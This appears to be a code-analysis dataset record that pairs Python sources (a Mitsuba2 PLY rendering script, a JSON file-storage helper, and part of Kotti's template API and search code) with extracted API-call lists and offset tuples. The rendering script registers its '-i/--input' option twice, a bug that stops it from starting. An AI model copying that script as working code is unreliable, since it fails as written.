"myfilm": {
"type": "hdrfilm",
"rfilter": {"type": "gaussian"},
"width": 1920,
"height": 1440,
"pixel_format": "rgba"
},
"mysampler": {
"type": "independent",
"sample_count": 64,
}
}
obb_center, obb_size, trans_inv = gravity_aligned_mobb(vertices[:, 0:3], np.array((0.0,1.0,0.0)))
rot = trans_inv
inv_rot = np.linalg.inv(rot)
cam_target = obb_center
cam_translate = Transform4f.translate(cam_target)
cam_un_translate = Transform4f.translate(-cam_target)
world_up = Vector3f(0, 0, -1)
cam_offvec = Vector3f(0, 0, 0)
margin = 1.0
radius = np.linalg.norm(obb_size) / 2.0 + margin
cam_offset = cam_offvec + world_up
cam_offset = rot.dot(cam_offset)
cam_offset = 2 * radius * cam_offset / np.linalg.norm(cam_offset)
cam_origin = cam_target + cam_offset
cam_up = rot.dot(Vector3f(0, 1, 0))
sensor_dict['to_world'] = ScalarTransform4f.look_at(origin=cam_origin, target=cam_target, up=cam_up)
data['myshape'] = shape_dict
data['mysensor'] = sensor_dict
data['myemitter'] = emitter_dict
scene = xml.load_dict(data)
sensor = scene.sensors()[0]
scene.integrator().render(scene, sensor)
film = sensor.film()
film.set_destination_file(os.path.splitext(output)[0]+'.exr')
film.develop()
img = film.bitmap(raw=True).convert(Bitmap.PixelFormat.RGB, Struct.Type.UInt8, srgb_gamma=True)
img.write(output)
# out = WriteXML('./test.xml')
# out.write_dict(data)
def configure(args):
if not utils.file_exist(args.input, '.ply'):
utils.print_e(f'Input file {args.input} not exists')
return False
dir_path = os.path.dirname(args.output)
if not utils.folder_exist(dir_path):
utils.print_e(f'Cannot create file in folder {dir_path}')
return False
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Mitsuba2 Rendering!')
parser.add_argument('-i', '--input', dest='input', type=str, action='store', required=True,
help='Input mesh ply file')
parser.add_argument('-i', '--input', dest='input', type=str, action='store', required=True,
help='Input mesh ply file')
parser.add_argument('-o', '--output', dest='output', type=str, action='store', required=True,
help='Output rendered png file')
args = parser.parse_args()
if not configure(args):
exit(0)
filename = os.path.realpath(args.input)
tmp_out_file = os.path.splitext(filename)[0]+'_temp_rgba_float.ply'
vertices = cvt_rgba2float(filename, tmp_out_file)
mts_render(tmp_out_file, vertices, args.output)
|
[
"plyfile.PlyElement.describe",
"mitsuba.core.xml.load_dict",
"mitsuba.core.Transform4f.translate",
"argparse.ArgumentParser",
"utils.file_exist",
"numpy.asarray",
"mitsuba.set_variant",
"mitsuba.core.ScalarTransform4f.look_at",
"os.path.dirname",
"os.path.realpath",
"utils.print_e",
"numpy.array",
"numpy.linalg.inv",
"numpy.linalg.norm",
"os.path.splitext",
"numpy.vstack",
"plyfile.PlyData.read",
"utils.folder_exist"
] |
[((74, 112), 'mitsuba.set_variant', 'mitsuba.set_variant', (['"""scalar_spectral"""'], {}), "('scalar_spectral')\n", (93, 112), False, 'import mitsuba\n'), ((426, 448), 'plyfile.PlyData.read', 'PlyData.read', (['filename'], {}), '(filename)\n', (438, 448), False, 'from plyfile import PlyData, PlyElement\n'), ((458, 492), 'numpy.asarray', 'np.asarray', (["plydata['vertex']['x']"], {}), "(plydata['vertex']['x'])\n", (468, 492), True, 'import numpy as np\n'), ((501, 535), 'numpy.asarray', 'np.asarray', (["plydata['vertex']['y']"], {}), "(plydata['vertex']['y'])\n", (511, 535), True, 'import numpy as np\n'), ((544, 578), 'numpy.asarray', 'np.asarray', (["plydata['vertex']['z']"], {}), "(plydata['vertex']['z'])\n", (554, 578), True, 'import numpy as np\n'), ((907, 1028), 'numpy.array', 'np.array', (['ply_vertices'], {'dtype': "[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red', 'f4'), ('green', 'f4'), (\n 'blue', 'f4')]"}), "(ply_vertices, dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red',\n 'f4'), ('green', 'f4'), ('blue', 'f4')])\n", (915, 1028), True, 'import numpy as np\n'), ((1070, 1113), 'plyfile.PlyElement.describe', 'PlyElement.describe', (['ply_vertices', '"""vertex"""'], {}), "(ply_vertices, 'vertex')\n", (1089, 1113), False, 'from plyfile import PlyData, PlyElement\n'), ((2254, 2272), 'numpy.linalg.inv', 'np.linalg.inv', (['rot'], {}), '(rot)\n', (2267, 2272), True, 'import numpy as np\n'), ((2321, 2354), 'mitsuba.core.Transform4f.translate', 'Transform4f.translate', (['cam_target'], {}), '(cam_target)\n', (2342, 2354), False, 'from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct\n'), ((2378, 2412), 'mitsuba.core.Transform4f.translate', 'Transform4f.translate', (['(-cam_target)'], {}), '(-cam_target)\n', (2399, 2412), False, 'from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct\n'), ((2811, 2885), 'mitsuba.core.ScalarTransform4f.look_at', 'ScalarTransform4f.look_at', ([], {'origin': 'cam_origin', 
'target': 'cam_target', 'up': 'cam_up'}), '(origin=cam_origin, target=cam_target, up=cam_up)\n', (2836, 2885), False, 'from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct\n'), ((3005, 3024), 'mitsuba.core.xml.load_dict', 'xml.load_dict', (['data'], {}), '(data)\n', (3018, 3024), False, 'from mitsuba.core import xml, Thread, ScalarTransform4f, Transform4f, Bitmap, Struct\n'), ((3567, 3595), 'os.path.dirname', 'os.path.dirname', (['args.output'], {}), '(args.output)\n', (3582, 3595), False, 'import os\n'), ((3782, 3840), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Mitsuba2 Rendering!"""'}), "(description='Mitsuba2 Rendering!')\n", (3805, 3840), False, 'import argparse\n'), ((4385, 4413), 'os.path.realpath', 'os.path.realpath', (['args.input'], {}), '(args.input)\n', (4401, 4413), False, 'import os\n'), ((2194, 2219), 'numpy.array', 'np.array', (['(0.0, 1.0, 0.0)'], {}), '((0.0, 1.0, 0.0))\n', (2202, 2219), True, 'import numpy as np\n'), ((2672, 2698), 'numpy.linalg.norm', 'np.linalg.norm', (['cam_offset'], {}), '(cam_offset)\n', (2686, 2698), True, 'import numpy as np\n'), ((3431, 3467), 'utils.file_exist', 'utils.file_exist', (['args.input', '""".ply"""'], {}), "(args.input, '.ply')\n", (3447, 3467), False, 'import utils\n'), ((3477, 3529), 'utils.print_e', 'utils.print_e', (['f"""Input file {args.input} not exists"""'], {}), "(f'Input file {args.input} not exists')\n", (3490, 3529), False, 'import utils\n'), ((3607, 3635), 'utils.folder_exist', 'utils.folder_exist', (['dir_path'], {}), '(dir_path)\n', (3625, 3635), False, 'import utils\n'), ((3645, 3702), 'utils.print_e', 'utils.print_e', (['f"""Cannot create file in folder {dir_path}"""'], {}), "(f'Cannot create file in folder {dir_path}')\n", (3658, 3702), False, 'import utils\n'), ((780, 818), 'numpy.vstack', 'np.vstack', (['(x, y, z, red, green, blue)'], {}), '((x, y, z, red, green, blue))\n', (789, 818), True, 'import numpy as np\n'), ((1190, 
1215), 'os.path.dirname', 'os.path.dirname', (['filename'], {}), '(filename)\n', (1205, 1215), False, 'import os\n'), ((2513, 2537), 'numpy.linalg.norm', 'np.linalg.norm', (['obb_size'], {}), '(obb_size)\n', (2527, 2537), True, 'import numpy as np\n'), ((4433, 4459), 'os.path.splitext', 'os.path.splitext', (['filename'], {}), '(filename)\n', (4449, 4459), False, 'import os\n'), ((3157, 3181), 'os.path.splitext', 'os.path.splitext', (['output'], {}), '(output)\n', (3173, 3181), False, 'import os\n')]
|
import os
import json
from typing import Union
class DataBasic:
path = ""
def first_startup(self):
if not os.path.exists(self.path):
os.mkdir(self.path)
print(f"created {self.path} directory")
class Data(DataBasic):
path = "./data"
def __init__(self):
self._buffer = {}
self.first_startup()
@property
def buffer(self):
return self._buffer
@staticmethod
def check_path(path: str):
if not os.path.exists(path):
os.mkdir(path)
print(f"Created {path}")
@staticmethod
def check_file(file: str, path: str):
if not os.path.exists(f"{path}/{file}"):
f = open(f"{path}/{file}", "w")
if file.endswith(".json"):
json.dump({}, f)
f.close()
def _load_file(self, *, file: str, path: str = ""):
path = f"{self.path}/{path}"
self.check_path(path)
self.check_file(file, path)
return open(f"{path}/{file}")
def get(self, *, file, path: str = "", buffer: bool = True) -> str:
if file not in self._buffer.keys():
f = self._load_file(file=file, path=path)
content = f.read()
if buffer:
self._buffer[file] = content
return content
else:
return self._buffer[file]
def get_json(self, *, file, path: str = "", buffer: bool = True) -> Union[list, dict]:
if file not in self._buffer.keys():
f = self._load_file(file=file + ".json", path=path)
content = json.load(f)
if buffer:
self._buffer[file] = content
return content
else:
return self._buffer[file]
def _save_file(self, *, data, file: str, path: str = ""):
path = f"{self.path}/{path}"
self.check_path(path)
f = open(f"{path}/{file}", "w")
if file.endswith(".json"):
json.dump(data, f)
else:
f.write(data)
f.close()
def set(self, *, file, path: str = "", data, buffer: bool = True):
if buffer:
self._buffer[file] = data
self._save_file(data=data, file=file, path=path)
def set_json(self, *, file, path: str = "", data, buffer: bool = True):
if buffer:
self._buffer[file] = data
self._save_file(data=data, file=file + ".json", path=path)
if __name__ == "__main__":
d = Data()
d.get_json(file="test", path="testing")
|
[
"json.dump",
"os.mkdir",
"json.load",
"os.path.exists"
] |
[((125, 150), 'os.path.exists', 'os.path.exists', (['self.path'], {}), '(self.path)\n', (139, 150), False, 'import os\n'), ((164, 183), 'os.mkdir', 'os.mkdir', (['self.path'], {}), '(self.path)\n', (172, 183), False, 'import os\n'), ((492, 512), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (506, 512), False, 'import os\n'), ((526, 540), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (534, 540), False, 'import os\n'), ((654, 686), 'os.path.exists', 'os.path.exists', (['f"""{path}/{file}"""'], {}), "(f'{path}/{file}')\n", (668, 686), False, 'import os\n'), ((1595, 1607), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1604, 1607), False, 'import json\n'), ((1972, 1990), 'json.dump', 'json.dump', (['data', 'f'], {}), '(data, f)\n', (1981, 1990), False, 'import json\n'), ((787, 803), 'json.dump', 'json.dump', (['{}', 'f'], {}), '({}, f)\n', (796, 803), False, 'import json\n')]
|
import hashlib
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlencode
from babel.dates import format_date
from babel.dates import format_datetime
from babel.dates import format_time
from babel.numbers import format_currency
from pyramid.decorator import reify
from pyramid.i18n import get_locale_name
from pyramid.interfaces import ILocation
from pyramid.location import inside
from pyramid.location import lineage
from pyramid.renderers import get_renderer
from pyramid.renderers import render
from pyramid.settings import asbool
from sqlalchemy import and_
from sqlalchemy import not_
from sqlalchemy import or_
from kotti import DBSession
from kotti import get_settings
from kotti.events import objectevent_listeners
from kotti.interfaces import INavigationRoot
from kotti.resources import Content
from kotti.resources import Document
from kotti.resources import Node
from kotti.resources import Tag
from kotti.resources import TagsToContents
from kotti.resources import get_root
from kotti.sanitizers import sanitize
from kotti.security import view_permitted
from kotti.util import TemplateStructure
from kotti.util import render_view
from kotti.views.site_setup import CONTROL_PANEL_LINKS
from kotti.views.slots import slot_events
class SettingHasValuePredicate:
def __init__(self, val, config):
self.name, self.value = val
if not isinstance(self.value, bool):
raise ValueError("Only boolean values supported")
def text(self):
return f"if_setting_has_value = {self.name} == {self.value}"
phash = text
def __call__(self, context, request):
return asbool(request.registry.settings[self.name]) == self.value
class RootOnlyPredicate:
def __init__(self, val, config):
self.val = val
def text(self):
return f"root_only = {self.val}"
phash = text
def __call__(self, context, request):
return (context is request.root) == self.val
def template_api(context, request, **kwargs):
return get_settings()["kotti.templates.api"][0](context, request, **kwargs)
def add_renderer_globals(event):
if event.get("renderer_name") != "json":
request = event["request"]
api = getattr(request, "template_api", None)
if api is None and request is not None:
api = template_api(event["context"], event["request"])
event["api"] = api
class Slots:
def __init__(self, context, request):
self.context = context
self.request = request
def __getattr__(self, key):
for event_type in slot_events:
if event_type.name == key:
break
else:
raise AttributeError(key)
value = []
event = event_type(self.context, self.request)
for snippet in objectevent_listeners(event):
if snippet is not None:
if isinstance(snippet, list):
value.extend(snippet)
else:
value.append(snippet)
setattr(self, key, value)
return value
class TemplateAPI:
    """This implements the ``api`` object that's passed to all templates.
    Use dict-access as a shortcut to retrieve template macros from templates.
    """
    # Instead of overriding these, consider using the
    # ``kotti.overrides`` variable.
    BARE_MASTER = "kotti:templates/master-bare.pt"
    VIEW_MASTER = "kotti:templates/view/master.pt"
    EDIT_MASTER = "kotti:templates/edit/master.pt"
    SITE_SETUP_MASTER = "kotti:templates/site-setup/master.pt"
    # Extra CSS class(es) the master templates render on <body>.
    body_css_class = ""
    def __init__(self, context, request, bare=None, **kwargs):
        self.context, self.request = context, request
        # Register this instance on the request so later lookups reuse it.
        if getattr(request, "template_api", None) is None:
            request.template_api = self
        # S: the application settings dictionary.
        self.S = get_settings()
        if request.is_xhr and bare is None:
            bare = True  # use bare template that renders just the content area
        self.bare = bare
        self.slots = Slots(context, request)
        # Arbitrary keyword arguments become attributes of the API object.
        self.__dict__.update(kwargs)
    @staticmethod
    def is_location(context):
        """Does `context` implement :class:`pyramid.interfaces.ILocation`?
        :param context: The context.
        :type context: kotti.interfaces.INode
        :rtype: bool
        :returns: True if the context object implements
        :class:`pyramid.interfaces.ILocation`.
        """
        return ILocation.providedBy(context)
    @reify
    def edit_needed(self):
        # Fanstatic resources to ``need()`` in edit mode; implicitly None
        # when the setting is not configured.
        if "kotti.fanstatic.edit_needed" in self.S:
            return [r.need() for r in self.S["kotti.fanstatic.edit_needed"]]
    @reify
    def view_needed(self):
        # Fanstatic resources to ``need()`` in view mode; implicitly None
        # when the setting is not configured.
        if "kotti.fanstatic.view_needed" in self.S:
            return [r.need() for r in self.S["kotti.fanstatic.view_needed"]]
    def macro(self, asset_spec, macro_name="main"):
        # Look up a template macro; in ``bare`` mode the three full master
        # templates are transparently swapped for the bare master.
        if self.bare and asset_spec in (
            self.VIEW_MASTER,
            self.EDIT_MASTER,
            self.SITE_SETUP_MASTER,
        ):
            asset_spec = self.BARE_MASTER
        return get_renderer(asset_spec).implementation().macros[macro_name]
    @reify
    def site_title(self):
        """ The site title.
        :result: Value of the ``kotti.site_title`` setting (if specified) or
        the root item's ``title`` attribute.
        :rtype: str
        """
        value = get_settings().get("kotti.site_title")
        if not value:
            value = self.root.title
        return value
    @reify
    def page_title(self):
        """
        Title for the current page as used in the ``<head>`` section of the
        default ``master.pt`` template.
        :result: '[Human readable view title ]``context.title`` -
        :meth:`~TemplateAPI.site_title`''
        :rtype: str
        """
        view_title = self.request.view_name.replace("_", " ").title()
        if view_title:
            view_title += " "
        view_title += self.context.title
        return f"{view_title} - {self.site_title}"
    def url(self, context=None, *elements, **kwargs):
        """
        URL construction helper. Just a convenience wrapper for
        :func:`pyramid.request.resource_url` with the same signature. If
        ``context`` is ``None`` the current context is passed to
        ``resource_url``.
        """
        if context is None:
            context = self.context
        # Non-location objects have no resource URL; fall back to the
        # current request URL.
        if not ILocation.providedBy(context):
            return self.request.url
        return self.request.resource_url(context, *elements, **kwargs)
    @reify
    def root(self):
        """
        The site root.
        :result: The root object of the site.
        :rtype: :class:`kotti.resources.Node`
        """
        if ILocation.providedBy(self.context):
            return self.lineage[-1]
        else:
            return get_root()
    @reify
    def navigation_root(self):
        """
        The root node for the navigation.
        :result: Nearest node in the :meth:`lineage` that provides
        :class:`kotti.interfaces.INavigationRoot` or :meth:`root` if
        no node provides that interface.
        :rtype: :class:`kotti.resources.Node`
        """
        for o in self.lineage:
            if INavigationRoot.providedBy(o):
                return o
        return self.root
    @reify
    def lineage(self):
        """
        Lineage from current context to the root node.
        :result: List of nodes.
        :rtype: list of :class:`kotti.resources.Node`
        """
        return list(lineage(self.context))
    @reify
    def breadcrumbs(self):
        """
        List of nodes from the :meth:`navigation_root` to the context.
        :result: List of nodes.
        :rtype: list of :class:`kotti.resources.Node`
        """
        breadcrumbs = self.lineage
        # Truncate the lineage at the navigation root when it differs from
        # the site root.
        if self.root != self.navigation_root:
            index = breadcrumbs.index(self.navigation_root)
            breadcrumbs = breadcrumbs[: index + 1]
        return reversed(breadcrumbs)
    def has_permission(self, permission, context=None):
        """ Convenience wrapper for :func:`pyramid.security.has_permission`
        with the same signature. If ``context`` is ``None`` the current
        context is passed to ``has_permission``."""
        if context is None:
            context = self.context
        return self.request.has_permission(permission, context)
    def render_view(self, name="", context=None, request=None, secure=True, bare=True):
        # Render another view inline; ``self.bare`` is temporarily switched
        # so the nested rendering uses the bare master by default, and is
        # always restored afterwards.
        if context is None:
            context = self.context
        if request is None:
            request = self.request
        before = self.bare
        try:
            self.bare = bare
            html = render_view(context, request, name, secure)
        finally:
            self.bare = before
        return TemplateStructure(html)
    def render_template(self, renderer, **kwargs):
        # Render an arbitrary template with ``kwargs`` as its namespace.
        return TemplateStructure(render(renderer, kwargs, self.request))
    def list_children(self, context=None, permission="view"):
        # Children of ``context`` filtered by ``permission``; pass
        # ``permission=None`` to skip the permission filter.
        if context is None:
            context = self.context
        if isinstance(context, Node):
            if permission is None:
                return context.children
            return context.children_with_permission(self.request, permission)
        # Non-Node containers: fall back to a ``values()`` mapping protocol.
        return [
            c
            for c in getattr(context, "values", lambda: [])()
            if (not permission or self.request.has_permission(permission, c))
        ]
    inside = staticmethod(inside)
    def avatar_url(self, user=None, size="14", default_image="identicon"):
        # Gravatar URL for ``user`` (defaults to the current request user);
        # falls back to the user name when no email is set.
        if user is None:
            user = self.request.user
        email = user.email
        if not email:
            email = user.name
        h = hashlib.md5(email.encode("utf8")).hexdigest()
        query = {"default": default_image, "size": str(size)}
        url = "https://secure.gravatar.com/avatar/{}?{}".format(h, urlencode(query))
        return url
    @reify
    def locale_name(self):
        # Locale negotiated for the current request.
        return get_locale_name(self.request)
    def format_date(self, d, fmt=None):
        # Localized date formatting; default format comes from settings.
        if fmt is None:
            fmt = self.S["kotti.date_format"]
        return format_date(d, format=fmt, locale=self.locale_name)
    def format_datetime(self, dt, fmt=None):
        # Localized datetime formatting; accepts a timestamp or datetime.
        if fmt is None:
            fmt = self.S["kotti.datetime_format"]
        if not isinstance(dt, datetime):
            dt = datetime.fromtimestamp(dt)
        return format_datetime(dt, format=fmt, locale=self.locale_name)
    def format_time(self, t, fmt=None):
        # Localized time formatting; default format comes from settings.
        if fmt is None:
            fmt = self.S["kotti.time_format"]
        return format_time(t, format=fmt, locale=self.locale_name)
    def format_currency(self, n, currency, fmt=None):
        # Localized currency formatting.
        return format_currency(n, currency, format=fmt, locale=self.locale_name)
    @staticmethod
    def get_type(name):
        # Resolve a content type class by its type_info name; implicitly
        # None when no type matches.
        for class_ in get_settings()["kotti.available_types"]:
            if class_.type_info.name == name:
                return class_
    def find_edit_view(self, item):
        # Pick the best edit view for ``item``: the current view name if
        # permitted, else 'edit', else the default view ''.
        view_name = self.request.view_name
        if not view_permitted(item, self.request, view_name):
            view_name = "edit"
        if not view_permitted(item, self.request, view_name):
            view_name = ""
        return view_name
    @reify
    def edit_links(self):
        # Edit links declared by the context's type_info, filtered by each
        # link's own visibility check.
        if not hasattr(self.context, "type_info"):
            return []
        return [
            link
            for link in self.context.type_info.edit_links
            if link.visible(self.context, self.request)
        ]
    @reify
    def site_setup_links(self):
        # Control-panel links visible to the current user.
        return [link for link in CONTROL_PANEL_LINKS
                if link.visible(self.root, self.request)]
    @staticmethod
    def sanitize(html, sanitizer="default"):
        """ Convenience wrapper for :func:`kotti.sanitizers.sanitize`.
        :param html: HTML to be sanitized
        :type html: str
        :param sanitizer: name of the sanitizer to use.
        :type sanitizer: str
        :result: sanitized HTML
        :rtype: str
        """
        return sanitize(html, sanitizer)
class NodesTree:
    """Lazy tree view over content nodes.

    Unknown attribute lookups delegate to the wrapped node object, so a
    NodesTree can mostly be used wherever the node itself would be.
    """
    def __init__(self, node, request, item_mapping, item_to_children, permission):
        self._node = node
        self._request = request
        self._item_mapping = item_mapping
        self._item_to_children = item_to_children
        self._permission = permission
    @property
    def __parent__(self):
        # A falsy parent_id (None) means "no parent" -> implicitly None.
        parent_id = self.parent_id
        if parent_id:
            return self._item_mapping[parent_id]
    @property
    def children(self):
        wrapped = []
        for child in self._item_to_children[self.id]:
            if not self._request.has_permission(self._permission, child):
                continue
            wrapped.append(
                NodesTree(
                    child,
                    self._request,
                    self._item_mapping,
                    self._item_to_children,
                    self._permission,
                )
            )
        return wrapped
    def _flatten(self, item):
        # Pre-order traversal yielding the raw node objects.
        # noinspection PyProtectedMember
        yield item._node
        for sub in item.children:
            yield from self._flatten(sub)
    def tolist(self):
        return list(self._flatten(self))
    def __getattr__(self, key):
        return getattr(self._node, key)
def nodes_tree(request, context=None, permission="view"):
    """Build a :class:`NodesTree` over all content the request may access.

    Children are grouped by parent id, sorted by position; the tree is
    rooted at ``context`` or, when ``context`` is None, at the site root
    (the single node whose parent_id is None).
    """
    item_mapping = {}
    item_to_children = defaultdict(list)
    for node in DBSession.query(Content).with_polymorphic(Content):
        item_mapping[node.id] = node
        if request.has_permission(permission, node):
            item_to_children[node.parent_id].append(node)
    for siblings in item_to_children.values():
        siblings.sort(key=lambda item: item.position)
    root = item_to_children[None][0] if context is None else context
    return NodesTree(root, request, item_mapping, item_to_children, permission)
def search_content(search_term, request=None):
    """Dispatch to the configured ``kotti.search_content`` implementation."""
    search_impl = get_settings()["kotti.search_content"][0]
    return search_impl(search_term, request)
def default_search_content(search_term, request=None):
    """Default implementation of content search.

    Matches ``search_term`` against name/title/description of all content,
    against document bodies and against tag titles, de-duplicates the
    results, and returns a dict per hit the request may view.

    :param search_term: substring to search for (wrapped in SQL ``%...%``).
    :param request: current request, used for the permission filter and for
        building resource paths.  NOTE(review): a ``None`` request fails at
        the permission check below; the default apparently only mirrors
        :func:`search_content`'s signature.
    :result: list of dicts with ``name``, ``title``, ``description``, ``path``.
    """
    # noinspection PyUnresolvedReferences
    searchstring = f"%{search_term}%"
    # generic_filter can be applied to all Node (and subclassed) objects
    generic_filter = or_(
        Content.name.like(searchstring),
        Content.title.like(searchstring),
        Content.description.like(searchstring),
    )
    results = (
        DBSession.query(Content)
        .filter(generic_filter)
        .order_by(Content.title.asc())
        .all()
    )
    # specific result contain objects matching additional criteria
    # but must not match the generic criteria (because these objects
    # are already in the generic_results)
    document_results = DBSession.query(Document).filter(
        and_(Document.body.like(searchstring), not_(generic_filter))
    )
    # Merge tag and document hits in, skipping duplicates.  (This replaces
    # a list comprehension that was used purely for its side effect.)
    for results_set in [content_with_tags([searchstring]), document_results.all()]:
        for c in results_set:
            if c not in results:
                results.append(c)
    result_dicts = []
    for result in results:
        if request.has_permission("view", result):
            result_dicts.append(
                dict(
                    name=result.name,
                    title=result.title,
                    description=result.description,
                    path=request.resource_path(result),
                )
            )
    return result_dicts
def content_with_tags(tag_terms):
    """Return all content whose tags match any of the (LIKE-)terms."""
    tag_filters = [Tag.title.like(term) for term in tag_terms]
    query = DBSession.query(Content).join(TagsToContents).join(Tag)
    return query.filter(or_(*tag_filters)).all()
def search_content_for_tags(tags, request=None):
    """Like :func:`default_search_content`, but matching on tags only."""
    result_dicts = []
    for item in content_with_tags(tags):
        if not request.has_permission("view", item):
            continue
        result_dicts.append(
            dict(
                name=item.name,
                title=item.title,
                description=item.description,
                path=request.resource_path(item),
            )
        )
    return result_dicts
def includeme(config):
    """ Pyramid includeme hook.
    :param config: app config
    :type config: :class:`pyramid.config.Configurator`
    """
    # Register the custom view predicates in the same order as before.
    for name, predicate in (
        ("root_only", RootOnlyPredicate),
        ("if_setting_has_value", SettingHasValuePredicate),
    ):
        config.add_view_predicate(name, predicate)
|
[
"pyramid.interfaces.ILocation.providedBy",
"kotti.get_settings",
"collections.defaultdict",
"pyramid.settings.asbool",
"kotti.util.TemplateStructure",
"kotti.security.view_permitted",
"kotti.resources.get_root",
"kotti.resources.Content.name.like",
"kotti.interfaces.INavigationRoot.providedBy",
"kotti.resources.Tag.title.like",
"kotti.DBSession.query",
"babel.dates.format_time",
"sqlalchemy.not_",
"pyramid.renderers.get_renderer",
"babel.numbers.format_currency",
"urllib.parse.urlencode",
"kotti.resources.Content.description.like",
"kotti.resources.Content.title.like",
"kotti.util.render_view",
"kotti.resources.Document.body.like",
"datetime.datetime.fromtimestamp",
"pyramid.renderers.render",
"babel.dates.format_datetime",
"kotti.events.objectevent_listeners",
"kotti.resources.Content.title.asc",
"babel.dates.format_date",
"pyramid.i18n.get_locale_name",
"kotti.sanitizers.sanitize",
"pyramid.location.lineage"
] |
[((13325, 13349), 'collections.defaultdict', 'defaultdict', (['(lambda : [])'], {}), '(lambda : [])\n', (13336, 13349), False, 'from collections import defaultdict\n'), ((2825, 2853), 'kotti.events.objectevent_listeners', 'objectevent_listeners', (['event'], {}), '(event)\n', (2846, 2853), False, 'from kotti.events import objectevent_listeners\n'), ((3848, 3862), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (3860, 3862), False, 'from kotti import get_settings\n'), ((4466, 4495), 'pyramid.interfaces.ILocation.providedBy', 'ILocation.providedBy', (['context'], {}), '(context)\n', (4486, 4495), False, 'from pyramid.interfaces import ILocation\n'), ((6756, 6790), 'pyramid.interfaces.ILocation.providedBy', 'ILocation.providedBy', (['self.context'], {}), '(self.context)\n', (6776, 6790), False, 'from pyramid.interfaces import ILocation\n'), ((8840, 8863), 'kotti.util.TemplateStructure', 'TemplateStructure', (['html'], {}), '(html)\n', (8857, 8863), False, 'from kotti.util import TemplateStructure\n'), ((10020, 10049), 'pyramid.i18n.get_locale_name', 'get_locale_name', (['self.request'], {}), '(self.request)\n', (10035, 10049), False, 'from pyramid.i18n import get_locale_name\n'), ((10176, 10227), 'babel.dates.format_date', 'format_date', (['d'], {'format': 'fmt', 'locale': 'self.locale_name'}), '(d, format=fmt, locale=self.locale_name)\n', (10187, 10227), False, 'from babel.dates import format_date\n'), ((10448, 10504), 'babel.dates.format_datetime', 'format_datetime', (['dt'], {'format': 'fmt', 'locale': 'self.locale_name'}), '(dt, format=fmt, locale=self.locale_name)\n', (10463, 10504), False, 'from babel.dates import format_datetime\n'), ((10631, 10682), 'babel.dates.format_time', 'format_time', (['t'], {'format': 'fmt', 'locale': 'self.locale_name'}), '(t, format=fmt, locale=self.locale_name)\n', (10642, 10682), False, 'from babel.dates import format_time\n'), ((10753, 10818), 'babel.numbers.format_currency', 'format_currency', (['n', 'currency'], 
{'format': 'fmt', 'locale': 'self.locale_name'}), '(n, currency, format=fmt, locale=self.locale_name)\n', (10768, 10818), False, 'from babel.numbers import format_currency\n'), ((12081, 12106), 'kotti.sanitizers.sanitize', 'sanitize', (['html', 'sanitizer'], {}), '(html, sanitizer)\n', (12089, 12106), False, 'from kotti.sanitizers import sanitize\n'), ((14213, 14244), 'kotti.resources.Content.name.like', 'Content.name.like', (['searchstring'], {}), '(searchstring)\n', (14230, 14244), False, 'from kotti.resources import Content\n'), ((14254, 14286), 'kotti.resources.Content.title.like', 'Content.title.like', (['searchstring'], {}), '(searchstring)\n', (14272, 14286), False, 'from kotti.resources import Content\n'), ((14296, 14334), 'kotti.resources.Content.description.like', 'Content.description.like', (['searchstring'], {}), '(searchstring)\n', (14320, 14334), False, 'from kotti.resources import Content\n'), ((1664, 1708), 'pyramid.settings.asbool', 'asbool', (['request.registry.settings[self.name]'], {}), '(request.registry.settings[self.name])\n', (1670, 1708), False, 'from pyramid.settings import asbool\n'), ((6434, 6463), 'pyramid.interfaces.ILocation.providedBy', 'ILocation.providedBy', (['context'], {}), '(context)\n', (6454, 6463), False, 'from pyramid.interfaces import ILocation\n'), ((6861, 6871), 'kotti.resources.get_root', 'get_root', ([], {}), '()\n', (6869, 6871), False, 'from kotti.resources import get_root\n'), ((7269, 7298), 'kotti.interfaces.INavigationRoot.providedBy', 'INavigationRoot.providedBy', (['o'], {}), '(o)\n', (7295, 7298), False, 'from kotti.interfaces import INavigationRoot\n'), ((7571, 7592), 'pyramid.location.lineage', 'lineage', (['self.context'], {}), '(self.context)\n', (7578, 7592), False, 'from pyramid.location import lineage\n'), ((8733, 8776), 'kotti.util.render_view', 'render_view', (['context', 'request', 'name', 'secure'], {}), '(context, request, name, secure)\n', (8744, 8776), False, 'from kotti.util import 
render_view\n'), ((8949, 8987), 'pyramid.renderers.render', 'render', (['renderer', 'kwargs', 'self.request'], {}), '(renderer, kwargs, self.request)\n', (8955, 8987), False, 'from pyramid.renderers import render\n'), ((9929, 9945), 'urllib.parse.urlencode', 'urlencode', (['query'], {}), '(query)\n', (9938, 9945), False, 'from urllib.parse import urlencode\n'), ((10406, 10432), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['dt'], {}), '(dt)\n', (10428, 10432), False, 'from datetime import datetime\n'), ((10884, 10898), 'kotti.get_settings', 'get_settings', ([], {}), '()\n', (10896, 10898), False, 'from kotti import get_settings\n'), ((11096, 11141), 'kotti.security.view_permitted', 'view_permitted', (['item', 'self.request', 'view_name'], {}), '(item, self.request, view_name)\n', (11110, 11141), False, 'from kotti.security import view_permitted\n'), ((11189, 11234), 'kotti.security.view_permitted', 'view_permitted', (['item', 'self.request', 'view_name'], {}), '(item, self.request, view_name)\n', (11203, 11234), False, 'from kotti.security import view_permitted\n'), ((13365, 13389), 'kotti.DBSession.query', 'DBSession.query', (['Content'], {}), '(Content)\n', (13380, 13389), False, 'from kotti import DBSession\n'), ((14686, 14711), 'kotti.DBSession.query', 'DBSession.query', (['Document'], {}), '(Document)\n', (14701, 14711), False, 'from kotti import DBSession\n'), ((14733, 14765), 'kotti.resources.Document.body.like', 'Document.body.like', (['searchstring'], {}), '(searchstring)\n', (14751, 14765), False, 'from kotti.resources import Document\n'), ((14767, 14787), 'sqlalchemy.not_', 'not_', (['generic_filter'], {}), '(generic_filter)\n', (14771, 14787), False, 'from sqlalchemy import not_\n'), ((2045, 